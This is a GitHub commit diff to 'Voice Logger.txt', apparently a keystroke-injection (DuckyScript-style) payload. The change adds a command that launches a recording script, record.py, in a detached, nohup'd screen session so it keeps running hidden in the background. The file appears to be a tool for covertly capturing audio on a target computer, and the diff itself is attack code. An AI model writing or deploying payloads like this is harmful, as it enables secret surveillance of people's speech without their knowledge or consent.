Update Voice Logger.txt

Added "nohup python3 record.py &" to the detached screen
This commit is contained in:
Narsty
2023-06-21 10:42:53 -05:00
committed by GitHub
parent b07691df9f
commit 5309cbbe4a
+1 -1
View File
@@ -30,7 +30,7 @@ STRING Terminal
DELAY 1000
ENTER
DELAY 500
STRING screen -dm bash -c
STRING screen -dm bash -c "nohup python3 record.py &"
DELAY 200
ENTER
DELAY 500